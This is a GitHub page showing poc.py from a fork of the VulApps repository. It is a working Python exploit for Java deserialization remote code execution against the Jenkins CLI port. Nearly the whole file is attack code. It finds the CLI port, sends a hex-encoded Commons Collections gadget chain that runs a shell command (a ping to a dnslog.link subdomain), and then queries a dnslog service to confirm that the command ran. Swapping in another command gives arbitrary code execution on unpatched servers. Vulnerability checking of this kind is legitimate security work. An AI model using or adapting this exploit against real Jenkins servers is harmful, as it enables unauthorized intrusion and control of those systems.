forked from Medicean/VulApps
-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathpoc.py
56 lines (49 loc) · 13 KB
/
poc.py
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
#!/usr/bin/env python
# coding: utf-8
import sys
import base64
import socket
import urlparse
import requests
import hashlib
import time
if len(sys.argv) < 2:
print('Usage: python %s <jenkins_web_url>' % sys.argv[0])
sys.exit()
jenkins_web_url = sys.argv[1]
flag = hashlib.md5(str(time.time())).hexdigest()[:16]
i_headers = {
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/46.0.2490.86 Safari/537.36'
}
print('[+] Send request to find CLI listener port from response headers')
response = requests.get(jenkins_web_url, headers=i_headers)
cli_port = int(response.headers['X-Jenkins-CLI-Port'])
print('[+] Found CLI listener port: "%s"' % cli_port)
sock_fd = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
host = urlparse.urlparse(jenkins_web_url).netloc
try:
host, port = host.split(':')
except:
host = host
cli_listener = (socket.gethostbyname(host), cli_port)
print('[+] Connecting CLI listener %s:%s' % cli_listener)
sock_fd.connect(cli_listener)
print('[+] Sending handshake headers')
headers = '\x00\x14\x50\x72\x6f\x74\x6f\x63\x6f\x6c\x3a\x43\x4c\x49\x2d\x63\x6f\x6e\x6e\x65\x63\x74'
sock_fd.send(headers)
sock_fd.recv(1024)
sock_fd.recv(1024)
payload_obj = "aced00057372003273756e2e7265666c6563742e616e6e6f746174696f6e2e416e6e6f746174696f6e496e766f636174696f6e48616e646c657255caf50f15cb7ea50200024c000c6d656d62657256616c75657374000f4c6a6176612f7574696c2f4d61703b4c0004747970657400114c6a6176612f6c616e672f436c6173733b7870737200316f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e6d61702e5472616e73666f726d65644d617061773fe05df15a700300024c000e6b65795472616e73666f726d657274002c4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b4c001076616c75655472616e73666f726d657271007e00057870707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436861696e65645472616e73666f726d657230c797ec287a97040200015b000d695472616e73666f726d65727374002d5b4c6f72672f6170616368652f636f6d6d6f6e732f636f6c6c656374696f6e732f5472616e73666f726d65723b78707572002d5b4c6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e5472616e73666f726d65723bbd562af1d83418990200007870000000047372003b6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e436f6e7374616e745472616e73666f726d6572587690114102b1940200014c000969436f6e7374616e747400124c6a6176612f6c616e672f4f626a6563743b7870767200116a6176612e6c616e672e52756e74696d65000000000000000000000078707372003a6f72672e6170616368652e636f6d6d6f6e732e636f6c6c656374696f6e732e66756e63746f72732e496e766f6b65725472616e73666f726d657287e8ff6b7b7cce380200035b000569417267737400135b4c6a6176612f6c616e672f4f626a6563743b4c000b694d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000b69506172616d54797065737400125b4c6a6176612f6c616e672f436c6173733b7870757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c02000078700000000274000a67657452756e74696d65757200125b4c6a6176612e6c616e672e436c6173733bab16d7aecbcd5a990200007870000000007400096765744d6574686f647571007e001900000002767200106a6176612e6c616e672e537472696e67a0f0a4387a3bb34202000078707671007e00197371007e00117571007e001600000002707571007e001600000000740006696e766f6b657571007e001900000002767200106a6176612e6c616e672e4f626a656374000000000000000000000078707671007e00167371007e00117571007e001600000001757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007870000000037400072f62696e2f73687400022d6374002b70696e67202d63203320623662623032656437333161653866322e746573742e646e736c6f672e6c696e6b740004657865637571007e0019000000017671007e002a737200116a6176612e7574696c2e486173684d61700507dac1c31660d103000246000a6c6f6164466163746f724900097468726573686f6c6478703f4000000000000c7708000000100000000174000576616c756574000d646f65732774206d617474657278787672001b6a6176612e6c616e672e616e6e6f746174696f6e2e54617267657400000000000000000000007870".decode('hex').replace("b6bb02ed731ae8f2", flag)
payload_obj_b64 = base64.b64encode(payload_obj)
payload = '\x3c\x3d\x3d\x3d\x5b\x4a\x45\x4e\x4b\x49\x4e\x53\x20\x52\x45\x4d\x4f\x54\x49\x4e\x47\x20\x43\x41\x50\x41\x43\x49\x54\x59\x5d\x3d\x3d\x3d\x3e'
payload += payload_obj_b64
payload += '00000000112daced00057372001b687564736f6e2e72656d6f74696e672e557365725265717565737400000000000000010200034c0010636c6173734c6f6164657250726f78797400304c687564736f6e2f72656d6f74696e672f52656d6f7465436c6173734c6f616465722449436c6173734c6f616465723b5b0007726571756573747400025b424c0008746f537472696e677400124c6a6176612f6c616e672f537472696e673b78720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b78720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b78707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc4020000787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00035b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd223902000078700000000c7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00034c000866696c654e616d6571007e00034c000a6d6574686f644e616d6571007e0003787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e00130000003c74001b687564736f6e2e72656d6f74696e672e557365725265717565737474001055736572526571756573742e6a61766171007e00177371007e001300000308740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174000463616c6c7371007e0013000000fa740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657274001c52656d6f7465496e766f636174696f6e48616e646c65722e6a617661740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e771007e002071007e002174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002d71007e002e7400055f6d61696e7371007e00130000018671007e002d71007e002e7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657870000000007704000000007871007e003c7871007e0008000000010000000070737d00000002002e687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f61646572001c687564736f6e2e72656d6f74696e672e49526561645265736f6c7665787200176a6176612e6c616e672e7265666c6563742e50726f7879e127da20cc1043cb0200014c0001687400254c6a6176612f6c616e672f7265666c6563742f496e766f636174696f6e48616e646c65723b787073720027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657200000000000000010300055a00146175746f556e6578706f7274427943616c6c65725a0009676f696e67486f6d654900036f69645a00097573657250726f78794c00066f726967696e71007e000d7870000000000002007371007e000b71007e004374007850726f787920687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572403220776173206372656174656420666f7220696e7465726661636520687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f616465722449436c6173734c6f616465727571007e00110000000d7371007e00130000007d71007e002471007e002571007e00177371007e00130000008971007e002471007e0025740004777261707371007e00130000026a71007e002071007e00217400066578706f72747371007e0013000002a6740021687564736f6e2e72656d6f74696e672e52656d6f7465436c6173734c6f6164657274001652656d6f7465436c6173734c6f616465722e6a61766171007e004a7371007e00130000004671007e001d71007e001e71007e00177371007e00130000030871007e002071007e002171007e00227371007e0013000000fa71007e002471007e002571007e00267371007e0013ffffffff71007e00287071007e00297371007e0013000004e771007e002071007e002171007e002b7371007e00130000009371007e002d71007e002e71007e00177371007e00130000004871007e003071007e003171007e00327371007e0013000001df71007e002d71007e002e71007e00347371007e00130000018671007e002d71007e002e71007e003671007e003a7878757200025b42acf317f8060854e0020000787000000746aced000573720032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737400000000000000010200044900036f69645b0009617267756d656e74737400135b4c6a6176612f6c616e672f4f626a6563743b4c000a6d6574686f644e616d657400124c6a6176612f6c616e672f537472696e673b5b000574797065737400135b4c6a6176612f6c616e672f537472696e673b7708fffffffe0000000278720017687564736f6e2e72656d6f74696e672e52657175657374000000000000000102000349000269644900086c617374496f49644c0008726573706f6e736574001a4c687564736f6e2f72656d6f74696e672f526573706f6e73653b77040000000078720017687564736f6e2e72656d6f74696e672e436f6d6d616e6400000000000000010200014c00096372656174656441747400154c6a6176612f6c616e672f457863657074696f6e3b77040000000078707372001e687564736f6e2e72656d6f74696e672e436f6d6d616e6424536f7572636500000000000000010200014c00067468697324307400194c687564736f6e2f72656d6f74696e672f436f6d6d616e643b770400000000787200136a6176612e6c616e672e457863657074696f6ed0fd1f3e1a3b1cc40200007704fffffffd787200136a6176612e6c616e672e5468726f7761626c65d5c635273977b8cb0300044c000563617573657400154c6a6176612f6c616e672f5468726f7761626c653b4c000d64657461696c4d65737361676571007e00025b000a737461636b547261636574001e5b4c6a6176612f6c616e672f537461636b5472616365456c656d656e743b4c001473757070726573736564457863657074696f6e737400104c6a6176612f7574696c2f4c6973743b7704fffffffd787071007e0010707572001e5b4c6a6176612e6c616e672e537461636b5472616365456c656d656e743b02462a3c3cfd22390200007704fffffffd78700000000b7372001b6a6176612e6c616e672e537461636b5472616365456c656d656e746109c59a2636dd8502000449000a6c696e654e756d6265724c000e6465636c6172696e67436c61737371007e00024c000866696c654e616d6571007e00024c000a6d6574686f644e616d6571007e00027704fffffffd787000000043740017687564736f6e2e72656d6f74696e672e436f6d6d616e6474000c436f6d6d616e642e6a6176617400063c696e69743e7371007e00130000003271007e001571007e001671007e00177371007e001300000063740017687564736f6e2e72656d6f74696e672e5265717565737474000c526571756573742e6a61766171007e00177371007e001300000239740032687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c6572245250435265717565737474001c52656d6f7465496e766f636174696f6e48616e646c65722e6a61766171007e00177371007e0013000000f6740027687564736f6e2e72656d6f74696e672e52656d6f7465496e766f636174696f6e48616e646c657271007e001e740006696e766f6b657371007e0013ffffffff740017687564736f6e2e72656d6f74696e672e2450726f7879317074000f77616974466f7250726f70657274797371007e0013000004e7740017687564736f6e2e72656d6f74696e672e4368616e6e656c74000c4368616e6e656c2e6a61766174001577616974466f7252656d6f746550726f70657274797371007e00130000009374000e687564736f6e2e636c692e434c49740008434c492e6a61766171007e00177371007e00130000004874001f687564736f6e2e636c692e434c49436f6e6e656374696f6e466163746f7279740019434c49436f6e6e656374696f6e466163746f72792e6a617661740007636f6e6e6563747371007e0013000001df71007e002a71007e002b7400055f6d61696e7371007e00130000018671007e002a71007e002b7400046d61696e737200266a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c654c697374fc0f2531b5ec8e100200014c00046c69737471007e000f7704fffffffd7872002c6a6176612e7574696c2e436f6c6c656374696f6e7324556e6d6f6469666961626c65436f6c6c656374696f6e19420080cb5ef71e0200014c0001637400164c6a6176612f7574696c2f436f6c6c656374696f6e3b7704fffffffd7870737200136a6176612e7574696c2e41727261794c6973747881d21d99c7619d03000149000473697a657704fffffffd7870000000007704000000007871007e00397871007e000800000000000000007000000001757200135b4c6a6176612e6c616e672e4f626a6563743b90ce589f1073296c0200007704fffffffd787000000001740018687564736f6e2e636c692e436c69456e747279506f696e7471007e0024757200135b4c6a6176612e6c616e672e537472696e673badd256e7e91d7b470200007704fffffffd7870000000017400106a6176612e6c616e672e4f626a65637474001d5250435265717565737428312c77616974466f7250726f706572747929'.decode('hex')
print('[+] Sending payload...')
sock_fd.send(payload)
print('[+] Check result...')
time.sleep(6)
resp = requests.get("http://admin.dnslog.link/api/dns/test/%s/" % (flag))
if "True" in resp.content:
print('[+] %s is Vulnerable' % jenkins_web_url)
else:
print('[-] Not Vulnerable')